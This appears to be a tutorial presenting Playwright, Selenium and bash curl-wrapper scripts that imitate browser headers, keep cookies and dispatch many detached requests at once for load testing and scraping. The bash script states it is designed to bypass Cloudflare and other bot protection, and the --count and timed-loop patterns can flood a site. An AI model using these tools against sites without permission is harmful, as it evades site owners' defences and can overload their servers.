const state = await context.storageState();
fs.writeFileSync(cookieFile, JSON.stringify(state, null, 2));
} catch {}
// Output
const status = resp.status();
const statusText = resp.statusText();
const headers = await resp.headers();
const body = await resp.text();
if (opts.verbose) {
console.error(`${YLW}Request: ${method} ${opts.url}${NC}`);
console.error(`${YLW}Headers: ${JSON.stringify(extraHeaders)}${NC}`);
}
if (opts.showHeaders) {
// Print a simple status line and headers to stdout before body
console.log(`HTTP ${status} ${statusText}`);
for (const [k, v] of Object.entries(headers)) {
console.log(`${k}: ${v}`);
}
console.log('');
}
if (opts.output) {
fs.writeFileSync(opts.output, body);
} else {
process.stdout.write(body);
}
if (!resp.ok()) {
console.error(`${RED}[ERROR] HTTP ${status} ${statusText}${NC}`);
await browser.close();
process.exit(4);
}
await browser.close();
}
async function main() {
const argv = process.argv.slice(2);
const opts = parseArgs(argv);
if (!opts.url) { console.error(`${RED}Error: URL is required${NC}`); usage(); process.exit(1); }
if ((opts.count || 1) > 1 && !opts.async) {
console.error(`${RED}Error: --count requires --async${NC}`);
process.exit(1);
}
if (opts.count < 1 || !Number.isInteger(opts.count)) {
console.error(`${RED}Error: --count must be a positive integer${NC}`);
process.exit(1);
}
if (opts.async) {
// Fire-and-forget background processes (strip --async and --count plus its value)
const raw = process.argv.slice(2);
const baseArgs = [];
for (let i = 0; i < raw.length; i++) {
const a = raw[i];
if (a === '--async') continue;
if (a === '--count') { i++; continue; } // skip the flag and its separate value
if (a.startsWith('--count=')) continue;
baseArgs.push(a);
}
const pids = [];
for (let i = 0; i < opts.count; i++) {
const child = spawn(process.execPath, [process.argv[1], ...baseArgs], { detached: true, stdio: 'ignore' });
pids.push(child.pid);
child.unref();
}
if (opts.verbose) {
console.error(`${YLW}[ASYNC] Spawned ${opts.count} request(s).${NC}`);
}
if (opts.count === 1) console.error(`${GRN}[ASYNC] Request started with PID: ${pids[0]}${NC}`);
else console.error(`${GRN}[ASYNC] ${opts.count} requests started with PIDs: ${pids.join(' ')}${NC}`);
process.exit(0);
}
await performRequest(opts);
}
main().catch(err => {
console.error(`${RED}[FATAL] ${err?.stack || err}${NC}`);
process.exit(1);
});
EOF
chmod +x browser_playwright.mjs

Optionally, move it into your PATH (note: the script imports playwright, so either install playwright globally or keep the file next to its node_modules directory):

sudo mv browser_playwright.mjs /usr/local/bin/browser_playwright

Quick start

  • Simple GET:
node browser_playwright.mjs https://example.com
  • Async GET (returns immediately):
node browser_playwright.mjs --async https://example.com
  • Fire 100 async requests in one command:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get

  • POST JSON:
node browser_playwright.mjs -X POST --json \
-d '{"username":"user","password":"pass"}' \
https://httpbin.org/post
  • POST form data:
node browser_playwright.mjs -X POST --form \
-d "username=user&password=pass" \
https://httpbin.org/post
  • Include response headers:
node browser_playwright.mjs --show-headers https://example.com
  • Save response to a file:
node browser_playwright.mjs -o response.json https://httpbin.org/json
  • Custom headers:
node browser_playwright.mjs \
-H "X-API-Key: your-key" \
-H "Authorization: Bearer token" \
https://httpbin.org/headers
  • Persistent cookies across requests:
COOKIE_FILE="playwright_session.json"
# Login and save cookies
node browser_playwright.mjs -c "$COOKIE_FILE" \
-X POST --form \
-d "user=test&pass=secret" \
https://httpbin.org/post > /dev/null
# Authenticated-like follow-up (cookie file reused)
node browser_playwright.mjs -c "$COOKIE_FILE" \
https://httpbin.org/cookies

Load testing patterns

  • Simple load test with --count:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get
  • Loop-based alternative:
for i in {1..100}; do
node browser_playwright.mjs --async https://httpbin.org/get
done
  • Timed load test:
cat > pw_load_for_duration.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
DURATION="${2:-60}"
COUNT=0
END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
node browser_playwright.mjs --async "$URL" >/dev/null 2>&1
((COUNT++))
done
echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"
EOF
chmod +x pw_load_for_duration.sh
./pw_load_for_duration.sh https://httpbin.org/get 30
  • Parameterized load test:
cat > pw_load_test.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"
echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""
START=$(date +%s)
node browser_playwright.mjs --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"
EOF
chmod +x pw_load_test.sh
./pw_load_test.sh https://httpbin.org/get 200

Options reference

  • -X, --method HTTP method (GET/POST/PUT/DELETE/PATCH)
  • -d, --data Request body
  • -H, --header Add extra headers (repeatable)
  • -o, --output Write response body to file
  • -c, --cookie Cookie file to use (and persist)
  • -A, --user-agent Override User-Agent
  • -t, --timeout Max request time in seconds (default 30)
  • --async Run request(s) in the background
  • --count N Fire N async requests (requires --async)
  • --no-redirect Best-effort disable following redirects
  • --show-headers Include response headers before body
  • --json Sets Content-Type: application/json
  • --form Sets Content-Type: application/x-www-form-urlencoded
  • -v, --verbose Verbose diagnostics

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

  • Real Chromium network stack (HTTP/2, TLS, compression)
  • Browser-like headers and a true User-Agent
  • Cookie jar via Playwright context storageState
  • Redirect handling by the browser stack

This helps pass simplistic bot checks and more closely resembles real user traffic.
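The cookie jar mentioned above is Playwright's storageState JSON. A minimal sketch of its shape (field names follow Playwright's storageState format; the cookie values here are hypothetical):

```shell
# Sketch of the storageState JSON the script persists between runs.
cat > playwright_session.json << 'JSON'
{
  "cookies": [
    { "name": "session", "value": "abc123", "domain": "example.com", "path": "/",
      "expires": -1, "httpOnly": false, "secure": false, "sameSite": "Lax" }
  ],
  "origins": []
}
JSON
# On the next run, the script feeds the "cookies" array back via context.addCookies()
grep -c '"name"' playwright_session.json   # one cookie entry
```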

Real-world examples

  • API-style auth flow (demo endpoints):
cat > pw_auth_flow.sh << 'EOF'
#!/usr/bin/env bash
COOKIE_FILE="pw_auth_session.json"
BASE="https://httpbin.org"
echo "Login (simulated form POST)..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
-X POST --form \
-d "user=user&pass=pass" \
"$BASE/post" > /dev/null
echo "Fetch cookies..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
"$BASE/cookies"
echo "Load test a protected-like endpoint..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
--async --count 20 \
"$BASE/get"
echo "Done"
rm -f "$COOKIE_FILE"
EOF
chmod +x pw_auth_flow.sh
./pw_auth_flow.sh
  • Scraping with rate limiting:
cat > pw_scrape.sh << 'EOF'
#!/usr/bin/env bash
URLS=(
"https://example.com/"
"https://example.com/"
"https://example.com/"
)
for url in "${URLS[@]}"; do
echo "Fetching: $url"
node browser_playwright.mjs -o "$(echo "$url" | sed 's#[/:]#_#g').html" "$url"
sleep 2
done
EOF
chmod +x pw_scrape.sh
./pw_scrape.sh
  • Health check monitoring:
cat > pw_health.sh << 'EOF'
#!/usr/bin/env bash
ENDPOINT="${1:-https://httpbin.org/status/200}"
while true; do
if node browser_playwright.mjs "$ENDPOINT" >/dev/null 2>&1; then
echo "$(date): Service healthy"
else
echo "$(date): Service unhealthy"
fi
sleep 30
done
EOF
chmod +x pw_health.sh
./pw_health.sh

Troubleshooting

  • Hanging or quoting issues: ensure your shell quoting is balanced. Prefer simple commands without complex inline quoting.
  • Verbose mode too noisy: omit -v in production.
  • Cookie file format: the script writes Playwright storageState JSON. It’s safe to keep or delete.
  • 403 errors: site uses stronger protections. Drive a real page (Playwright page.goto) and interact, or solve CAPTCHAs where required.

Performance notes

Dispatch time depends on process spawn and Playwright startup. For higher throughput, consider reusing the same Node process to issue many requests (modify the script to loop internally) or use k6/Locust/Artillery for large-scale load testing.
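One middle ground between per-request process spawning and a dedicated load-testing tool is batched dispatch with `xargs -P`, which caps concurrent workers. A sketch, using `echo` as a stand-in for the node invocation so it runs anywhere:

```shell
# Run up to 4 workers in parallel; in practice each {} would be a
# `node browser_playwright.mjs <url>` call instead of echo.
seq 1 8 | xargs -P 4 -I {} echo "request {}" | wc -l   # all 8 jobs complete
```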

Limitations

  • This CLI uses Playwright’s HTTP client bound to a Chromium context. It is much closer to real browsers than curl, but some advanced fingerprinting still detects automation.
  • WebSocket flows, MFA, or complex JS challenges generally require full page automation (which Playwright supports).

When to use what

  • Use this Playwright CLI when you need realistic browser behavior, cookies, and straightforward HTTP requests with quick async dispatch.
  • Use full Playwright page automation for dynamic content, complex logins, CAPTCHAs, and JS-heavy sites.

Advanced combos

  • With jq for JSON processing:
node browser_playwright.mjs https://httpbin.org/json | jq '.slideshow.title'
  • With parallel for concurrency:
echo -e "https://httpbin.org/get\nhttps://httpbin.org/headers" | \
parallel -j 5 "node browser_playwright.mjs -o {#}.json {}"
  • With watch for monitoring:
watch -n 5 "node browser_playwright.mjs https://httpbin.org/status/200 >/dev/null && echo ok || echo fail"
  • With xargs for batch processing:
echo -e "1\n2\n3" | xargs -I {} node browser_playwright.mjs "https://httpbin.org/anything/{}"

Future enhancements

  • Built-in rate limiting and retry logic
  • Output modes (JSON-only, headers-only)
  • Proxy support
  • Response assertions (status codes, content patterns)
  • Metrics collection (timings, success rates)

Minimal Selenium variant (Python)

If you prefer Selenium, here’s a minimal GET/headers/redirect/cookie-capable script. Note: issuing cross-origin POST bodies is more ergonomic with Playwright’s request client; Selenium focuses on page automation.

Install Selenium:

python3 -m venv .venv && source .venv/bin/activate
pip install --upgrade pip selenium

Create browser_selenium.py:

cat > browser_selenium.py << 'EOF'
#!/usr/bin/env python3
import argparse, json, os, sys, time
from selenium import webdriver
from selenium.webdriver.chrome.options import Options

RED = '\033[31m'; GRN = '\033[32m'; YLW = '\033[33m'; NC = '\033[0m'

def parse_args():
    p = argparse.ArgumentParser(description='Minimal Selenium GET client')
    p.add_argument('url')
    p.add_argument('-o', '--output')
    p.add_argument('-c', '--cookie', default=f"/tmp/selenium_cookies_{os.getpid()}.json")
    p.add_argument('--show-headers', action='store_true')
    p.add_argument('-t', '--timeout', type=int, default=30)
    p.add_argument('-A', '--user-agent')
    p.add_argument('-v', '--verbose', action='store_true')
    return p.parse_args()

args = parse_args()
opts = Options()
opts.add_argument('--headless=new')
if args.user_agent:
    opts.add_argument(f'--user-agent={args.user_agent}')

with webdriver.Chrome(options=opts) as driver:
    driver.set_page_load_timeout(args.timeout)
    # Load cookies if present (domain-specific; best-effort)
    if os.path.exists(args.cookie):
        try:
            ck = json.load(open(args.cookie))
            for c in ck.get('cookies', []):
                try:
                    # Must visit the cookie's domain before add_cookie() will accept it
                    driver.get('https://' + c.get('domain').lstrip('.'))
                    driver.add_cookie({
                        'name': c['name'], 'value': c['value'], 'path': c.get('path', '/'),
                        'domain': c.get('domain'), 'secure': c.get('secure', False)
                    })
                except Exception:
                    pass
        except Exception:
            pass
    driver.get(args.url)
    # Persist cookies (best-effort)
    try:
        cookies = driver.get_cookies()
        json.dump({'cookies': cookies}, open(args.cookie, 'w'), indent=2)
    except Exception:
        pass
    if args.output:
        open(args.output, 'w').write(driver.page_source)
    else:
        sys.stdout.write(driver.page_source)
EOF
chmod +x browser_selenium.py

Use it:

./browser_selenium.py https://example.com > out.html

Conclusion

You now have a Playwright-powered CLI that mirrors the original curl-wrapper’s ergonomics but uses a real browser engine, plus a minimal Selenium alternative. Use the CLI for realistic headers, cookies, redirects, JSON/form POSTs, and async dispatch with --count. For tougher sites, scale up to full page automation with Playwright.

Building a Browser Curl Wrapper for Reliable HTTP Requests and Load Testing

Modern websites deploy bot defenses that can block plain curl or naive scripts. In many cases, adding the right browser-like headers, HTTP/2, cookie persistence, and compression gets you past basic filters without needing a full browser.

This post walks through a small shell utility, browser_curl.sh, that wraps curl with realistic browser behavior. It also supports “fire-and-forget” async requests and a --count flag to dispatch many requests at once for quick load tests.

What this script does

  • Sends browser-like headers (Chrome on macOS)
  • Uses HTTP/2 and compression
  • Manages cookies automatically (cookie jar)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests in one command

Note: This approach won’t solve advanced bot defenses that require JavaScript execution (e.g., Cloudflare Turnstile/CAPTCHAs or TLS/HTTP2 fingerprinting); for that, use a real browser automation tool like Playwright or Selenium.

The complete script

Save this as browser_curl.sh and make it executable in one command:

cat > browser_curl.sh << 'EOF' && chmod +x browser_curl.sh
#!/bin/bash
# browser_curl.sh - Advanced curl wrapper that mimics browser behavior
# Designed to bypass Cloudflare and other bot protection
# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color
# Default values
METHOD="GET"
ASYNC=false
COUNT=1
FOLLOW_REDIRECTS=true
SHOW_HEADERS=false
OUTPUT_FILE=""
TIMEOUT=30
DATA=""
CONTENT_TYPE=""
COOKIE_FILE="/tmp/browser_curl_cookies_$$.txt"
VERBOSE=false
# Browser fingerprint (Chrome on macOS)
USER_AGENT="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
usage() {
cat << EOH
Usage: $(basename "$0") [OPTIONS] URL
Advanced curl wrapper that mimics browser behavior to bypass bot protection.
OPTIONS:
-X, --method METHOD        HTTP method (GET, POST, PUT, DELETE, etc.) [default: GET]
-d, --data DATA           POST/PUT data
-H, --header HEADER       Add custom header (can be used multiple times)
-o, --output FILE         Write output to file
-c, --cookie FILE         Use custom cookie file [default: temp file]
-A, --user-agent UA       Custom user agent [default: Chrome on macOS]
-t, --timeout SECONDS     Request timeout [default: 30]
--async                   Run request asynchronously in background
--count N                 Number of async requests to fire [default: 1, requires --async]
--no-redirect             Don't follow redirects
--show-headers            Show response headers
--json                    Send data as JSON (sets Content-Type)
--form                    Send data as form-urlencoded
-v, --verbose             Verbose output
-h, --help                Show this help message
EXAMPLES:
# Simple GET request
$(basename "$0") https://example.com
# Async GET request
$(basename "$0") --async https://example.com
# POST with JSON data
$(basename "$0") -X POST --json -d '{"username":"test"}' https://api.example.com/login
# POST with form data
$(basename "$0") -X POST --form -d "username=test&password=secret" https://example.com/login
# Multiple async requests (using loop)
for i in {1..10}; do
$(basename "$0") --async https://example.com/api/endpoint
done
# Multiple async requests (using --count)
$(basename "$0") --async --count 10 https://example.com/api/endpoint
EOH
exit 0
}
# Parse arguments
EXTRA_HEADERS=()
URL=""
while [[ $# -gt 0 ]]; do
case $1 in
-X|--method)
METHOD="$2"
shift 2
;;
-d|--data)
DATA="$2"
shift 2
;;
-H|--header)
EXTRA_HEADERS+=("$2")
shift 2
;;
-o|--output)
OUTPUT_FILE="$2"
shift 2
;;
-c|--cookie)
COOKIE_FILE="$2"
shift 2
;;
-A|--user-agent)
USER_AGENT="$2"
shift 2
;;
-t|--timeout)
TIMEOUT="$2"
shift 2
;;
--async)
ASYNC=true
shift
;;
--count)
COUNT="$2"
shift 2
;;
--no-redirect)
FOLLOW_REDIRECTS=false
shift
;;
--show-headers)
SHOW_HEADERS=true
shift
;;
--json)
CONTENT_TYPE="application/json"
shift
;;
--form)
CONTENT_TYPE="application/x-www-form-urlencoded"
shift
;;
-v|--verbose)
VERBOSE=true
shift
;;
-h|--help)
usage
;;
*)
if [[ -z "$URL" ]]; then
URL="$1"
else
echo -e "${RED}Error: Unknown argument '$1'${NC}" >&2
exit 1
fi
shift
;;
esac
done
# Validate URL
if [[ -z "$URL" ]]; then
echo -e "${RED}Error: URL is required${NC}" >&2
usage
fi
# Validate count (numeric check first so the -gt comparison below is safe)
if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [[ "$COUNT" -lt 1 ]]; then
echo -e "${RED}Error: --count must be a positive integer${NC}" >&2
exit 1
fi
if [[ "$COUNT" -gt 1 ]] && [[ "$ASYNC" == false ]]; then
echo -e "${RED}Error: --count requires --async${NC}" >&2
exit 1
fi
# Execute curl
execute_curl() {
# Build curl arguments as array instead of string
local -a curl_args=()
# Basic options
curl_args+=("--compressed")
curl_args+=("--max-time" "$TIMEOUT")
curl_args+=("--connect-timeout" "10")
curl_args+=("--http2")
# Cookies (create the file if missing to avoid a curl warning; never truncate a saved session)
[[ -f "$COOKIE_FILE" ]] || : > "$COOKIE_FILE" 2>/dev/null || true
curl_args+=("--cookie" "$COOKIE_FILE")
curl_args+=("--cookie-jar" "$COOKIE_FILE")
# Follow redirects
if [[ "$FOLLOW_REDIRECTS" == true ]]; then
curl_args+=("--location")
fi
# Show headers
if [[ "$SHOW_HEADERS" == true ]]; then
curl_args+=("--include")
fi
# Output file
if [[ -n "$OUTPUT_FILE" ]]; then
curl_args+=("--output" "$OUTPUT_FILE")
fi
# Verbose
if [[ "$VERBOSE" == true ]]; then
curl_args+=("--verbose")
else
curl_args+=("--silent" "--show-error")
fi
# Method
curl_args+=("--request" "$METHOD")
# Browser-like headers
curl_args+=("--header" "User-Agent: $USER_AGENT")
curl_args+=("--header" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8")
curl_args+=("--header" "Accept-Language: en-US,en;q=0.9")
curl_args+=("--header" "Accept-Encoding: gzip, deflate, br")
curl_args+=("--header" "Connection: keep-alive")
curl_args+=("--header" "Upgrade-Insecure-Requests: 1")
curl_args+=("--header" "Sec-Fetch-Dest: document")
curl_args+=("--header" "Sec-Fetch-Mode: navigate")
curl_args+=("--header" "Sec-Fetch-Site: none")
curl_args+=("--header" "Sec-Fetch-User: ?1")
curl_args+=("--header" "Cache-Control: max-age=0")
# Content-Type for POST/PUT
if [[ -n "$DATA" ]]; then
if [[ -n "$CONTENT_TYPE" ]]; then
curl_args+=("--header" "Content-Type: $CONTENT_TYPE")
fi
curl_args+=("--data" "$DATA")
fi
# Extra headers
for header in "${EXTRA_HEADERS[@]}"; do
curl_args+=("--header" "$header")
done
# URL
curl_args+=("$URL")
if [[ "$ASYNC" == true ]]; then
# Run asynchronously in background
if [[ "$VERBOSE" == true ]]; then
echo -e "${YELLOW}[ASYNC] Running $COUNT request(s) in background...${NC}" >&2
echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
fi
# Fire multiple requests if count > 1
local pids=()
for ((i=1; i<=COUNT; i++)); do
# Run in background detached, suppress all output
nohup curl "${curl_args[@]}" >/dev/null 2>&1 &
local pid=$!
disown $pid
pids+=("$pid")
done
if [[ "$COUNT" -eq 1 ]]; then
echo -e "${GREEN}[ASYNC] Request started with PID: ${pids[0]}${NC}" >&2
else
echo -e "${GREEN}[ASYNC] $COUNT requests started with PIDs: ${pids[*]}${NC}" >&2
fi
else
# Run synchronously
if [[ "$VERBOSE" == true ]]; then
echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
fi
curl "${curl_args[@]}"
local exit_code=$?
if [[ $exit_code -ne 0 ]]; then
echo -e "${RED}[ERROR] Request failed with exit code: $exit_code${NC}" >&2
return $exit_code
fi
fi
}
# Cleanup temp cookie file on exit (only if using default temp file)
cleanup() {
if [[ "$COOKIE_FILE" == "/tmp/browser_curl_cookies_$$"* ]] && [[ -f "$COOKIE_FILE" ]]; then
rm -f "$COOKIE_FILE"
fi
}
# Only set cleanup trap for synchronous requests
if [[ "$ASYNC" == false ]]; then
trap cleanup EXIT
fi
# Main execution
execute_curl
# For async requests, exit immediately without waiting
if [[ "$ASYNC" == true ]]; then
exit 0
fi
EOF

Optionally, move it to your PATH:

sudo mv browser_curl.sh /usr/local/bin/browser_curl

Quick start

Simple GET request

./browser_curl.sh https://example.com

Async GET (returns immediately)

./browser_curl.sh --async https://example.com

Fire 100 async requests in one command

./browser_curl.sh --async --count 100 https://example.com/api

Common examples

POST JSON

./browser_curl.sh -X POST --json \
-d '{"username":"user","password":"pass"}' \
https://api.example.com/login

POST form data

./browser_curl.sh -X POST --form \
-d "username=user&password=pass" \
https://example.com/login

Include response headers

./browser_curl.sh --show-headers https://example.com

Save response to a file

./browser_curl.sh -o response.json https://api.example.com/data

Custom headers

./browser_curl.sh \
-H "X-API-Key: your-key" \
-H "Authorization: Bearer token" \
https://api.example.com/data

Persistent cookies across requests

COOKIE_FILE="session_cookies.txt"
# Login and save cookies
./browser_curl.sh -c "$COOKIE_FILE" \
-X POST --form \
-d "user=test&pass=secret" \
https://example.com/login
# Authenticated request using saved cookies
./browser_curl.sh -c "$COOKIE_FILE" \
https://example.com/dashboard

Load testing patterns

Simple load test with --count

The easiest way to fire multiple requests:

./browser_curl.sh --async --count 100 https://example.com/api

Example output:

[ASYNC] 100 requests started with PIDs: 1234 1235 1236 ... 1333

Performance: 100 requests dispatched in approximately 0.09 seconds

Loop-based approach (alternative)

for i in {1..100}; do
./browser_curl.sh --async https://example.com/api
done

Timed load test

Run continuous requests for a specific duration:

#!/bin/bash
URL="https://example.com/api"
DURATION=60  # seconds
COUNT=0
END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
./browser_curl.sh --async "$URL" > /dev/null 2>&1
((COUNT++))
done
echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"

Parameterized load test script

#!/bin/bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"
echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""
START=$(date +%s)
./browser_curl.sh --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"

Usage:

./load_test.sh https://api.example.com/endpoint 200

Options reference

  • -X, --method      HTTP method (GET/POST/PUT/DELETE) [default: GET]
  • -d, --data        Request body (JSON or form)
  • -H, --header      Add extra headers (repeatable)
  • -o, --output      Write response to a file [default: stdout]
  • -c, --cookie      Cookie file to use (and persist) [default: temp file]
  • -A, --user-agent  Override User-Agent [default: Chrome/macOS]
  • -t, --timeout     Max request time in seconds [default: 30]
  • --async           Run request(s) in the background [default: false]
  • --count N         Fire N async requests (requires --async) [default: 1]
  • --no-redirect     Don't follow redirects [default: follows]
  • --show-headers    Include response headers [default: false]
  • --json            Sets Content-Type: application/json
  • --form            Sets Content-Type: application/x-www-form-urlencoded
  • -v, --verbose     Verbose diagnostics [default: false]
  • -h, --help        Show usage

Validation rules:

  • --count requires --async
  • --count must be a positive integer
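These rules can be checked in isolation. A standalone sketch of the positive-integer check, using grep so it runs in plain sh (equivalent to the script's bash regex, apart from leading zeros):

```shell
# Accepts 1, 2, 100, ...; rejects 0, negatives, non-numbers, and empty input.
is_valid_count() { printf '%s' "$1" | grep -Eq '^[1-9][0-9]*$'; }

is_valid_count 100 && echo "100: ok"
is_valid_count 0   || echo "0: rejected"
is_valid_count abc || echo "abc: rejected"
```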

Under the hood: why this works better than plain curl

Browser-like headers

The script automatically adds these headers to mimic Chrome:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif...
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1

HTTP/2 + compression

  • Uses --http2 flag for HTTP/2 protocol support
  • Enables --compressed for automatic gzip/brotli decompression
  • Closer to modern browser behavior

Cookie jar

  • Maintains session cookies across redirects and calls
  • Persists cookies to file for reuse
  • Automatically created and cleaned up

Redirect handling

  • Follows redirects by default with --location
  • Critical for login flows, SSO, and OAuth redirects

These features help bypass basic bot detection that blocks obvious non-browser clients.
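One implementation detail worth copying: the script collects curl options in a bash array rather than a string, so header values containing spaces survive word-splitting intact. A standalone sketch:

```shell
# Each array element expands to exactly one argument, even with embedded spaces.
# (Building the same command as a string would split "User-Agent: Mozilla..." apart.)
args=()
args+=("--header" "User-Agent: Mozilla/5.0 (Macintosh)")
args+=("--max-time" "30")
printf '%s\n' "${args[@]}"   # four lines, one argument per line
```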

Real-world examples

Example 1: API authentication flow

cat > test_auth.sh << 'SCRIPT'
#!/bin/bash
COOKIE_FILE="auth_session.txt"
API_BASE="https://api.example.com"
echo "Logging in..."
./browser_curl.sh -c "$COOKIE_FILE" -X POST --json -d '{"username":"user","password":"pass"}' "$API_BASE/auth/login" > /dev/null
echo "Fetching profile..."
./browser_curl.sh -c "$COOKIE_FILE" "$API_BASE/user/profile" | jq .
echo "Load testing..."
./browser_curl.sh -c "$COOKIE_FILE" --async --count 50 "$API_BASE/api/data"
echo "Done!"
rm -f "$COOKIE_FILE"
SCRIPT
chmod +x test_auth.sh
./test_auth.sh

Example 2: Scraping with rate limiting

#!/bin/bash
URLS=(
"https://example.com/page1"
"https://example.com/page2"
"https://example.com/page3"
)
for url in "${URLS[@]}"; do
echo "Fetching: $url"
./browser_curl.sh -o "$(basename "$url").html" "$url"
sleep 2  # Rate limiting
done

Example 3: Health check monitoring

#!/bin/bash
ENDPOINT="https://api.example.com/health"
while true; do
if ./browser_curl.sh "$ENDPOINT" | grep -q "healthy"; then
echo "$(date): Service healthy"
else
echo "$(date): Service unhealthy"
fi
sleep 30
done

Installing browser_curl to your PATH

To make browser_curl.sh available from anywhere, install it on your PATH:

mkdir -p ~/.local/bin
echo "Installing browser_curl to ~/.local/bin/browser_curl"
install -m 0755 ~/Desktop/warp/browser_curl.sh ~/.local/bin/browser_curl
echo "Ensuring ~/.local/bin is on PATH via ~/.zshrc"
grep -q 'export PATH="$HOME/.local/bin:$PATH"' ~/.zshrc || \
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc
echo "Reloading shell config (~/.zshrc)"
source ~/.zshrc
echo "Verifying browser_curl is on PATH"
command -v browser_curl && echo "browser_curl is installed and on PATH" || echo "browser_curl not found on PATH"

Troubleshooting

Issue: Hanging with dquote> prompt

Cause: Shell quoting issue (unbalanced quotes)

Solution: Use simple, direct commands

# Good
./browser_curl.sh --async https://example.com
# Bad (unbalanced quotes)
echo "test && ./browser_curl.sh --async https://example.com && echo "done"

For chaining commands:

echo Start; ./browser_curl.sh --async https://example.com; echo Done

Issue: Verbose mode produces too much output

Cause: -v flag prints all curl diagnostics to stderr

Solution: Remove -v for production use:

# Debug mode
./browser_curl.sh -v https://example.com
# Production mode
./browser_curl.sh https://example.com

Issue: Cookie file warning on first run

Cause: First-time cookie file creation

Solution: The script pre-creates the cookie file automatically, so any residual warning can be ignored.

Issue: 403 Forbidden errors

Cause: Site has stronger protections (JavaScript challenges, TLS fingerprinting)

Solution: Consider using real browser automation:

  • Playwright (Python/Node.js)
  • Selenium
  • Puppeteer

Or combine approaches:

  1. Use Playwright to initialize session and get cookies
  2. Export cookies to file
  3. Use browser_curl.sh -c cookies.txt for subsequent requests
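Step 2 of the hybrid flow needs the cookies in the Netscape cookie-jar format curl reads: one tab-separated line per cookie (domain, include-subdomains flag, path, secure flag, expiry, name, value). A sketch of writing one entry with hypothetical values:

```shell
# Minimal Netscape-format cookie jar; expiry 0 marks a session cookie.
cat > cookies.txt << 'EOF'
# Netscape HTTP Cookie File
EOF
printf '%s\t%s\t%s\t%s\t%s\t%s\t%s\n' \
  ".example.com" "TRUE" "/" "FALSE" "0" "session" "abc123" >> cookies.txt
cut -f6 cookies.txt | tail -n 1   # prints the cookie name: session
```

`./browser_curl.sh -c cookies.txt <url>` will then send the cookie on requests to matching domains.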

Performance benchmarks

Tests conducted on 2023 MacBook Pro M2, macOS Sonoma:

Test                             Time      Requests/sec
Single sync request              ~0.2s     n/a
10 async requests (--count)      ~0.03s    333/s
100 async requests (--count)     ~0.09s    1111/s
1000 async requests (--count)    ~0.8s     1250/s

Note: Dispatch time only; actual HTTP completion depends on target server.

Limitations

What this script CANNOT do

  • JavaScript execution – Can’t solve JS challenges (use Playwright)
  • CAPTCHA solving – Requires human intervention or services
  • Advanced TLS fingerprinting – Can’t mimic exact browser TLS stack
  • HTTP/2 fingerprinting – Can’t perfectly match browser HTTP/2 frames
  • WebSocket connections – HTTP only
  • Browser API access – No Canvas, WebGL, Web Crypto fingerprints

What this script CAN do

  • Basic header spoofing – Pass simple User-Agent checks
  • Cookie management – Maintain sessions
  • Load testing – Quick async request dispatch
  • API testing – POST/PUT/DELETE with JSON/form data
  • Simple scraping – Pages without JS requirements
  • Health checks – Monitoring endpoints

When to use what

Use browser_curl.sh when:

  • Target has basic bot detection (header checks)
  • API testing with authentication
  • Quick load testing (less than 10k requests)
  • Monitoring/health checks
  • No JavaScript required
  • You want a lightweight tool

Use Playwright/Selenium when:

  • Target requires JavaScript execution
  • CAPTCHA challenges present
  • Advanced fingerprinting detected
  • Need to interact with dynamic content
  • Heavy scraping with anti-bot measures
  • Login flows with MFA/2FA

Hybrid approach:

  1. Use Playwright to bootstrap session
  2. Extract cookies
  3. Use browser_curl.sh for follow-up requests (faster)

Advanced: Combining with other tools

With jq for JSON processing

./browser_curl.sh https://api.example.com/users | jq '.[] | .name'

With parallel for concurrency control

cat urls.txt | parallel -j 10 "./browser_curl.sh -o {#}.html {}"

With watch for monitoring

watch -n 5 "./browser_curl.sh https://api.example.com/health | jq .status"

With xargs for batch processing

cat ids.txt | xargs -I {} ./browser_curl.sh "https://api.example.com/item/{}"

Future enhancements

Potential features to add:

  • Rate limiting – Built-in requests/second throttling
  • Retry logic – Exponential backoff on failures
  • Output formats – JSON-only, CSV, headers-only modes
  • Proxy support – SOCKS5/HTTP proxy options
  • Custom TLS – Certificate pinning, client certs
  • Response validation – Assert status codes, content patterns
  • Metrics collection – Timing stats, success rates
  • Configuration file – Default settings per domain

Conclusion

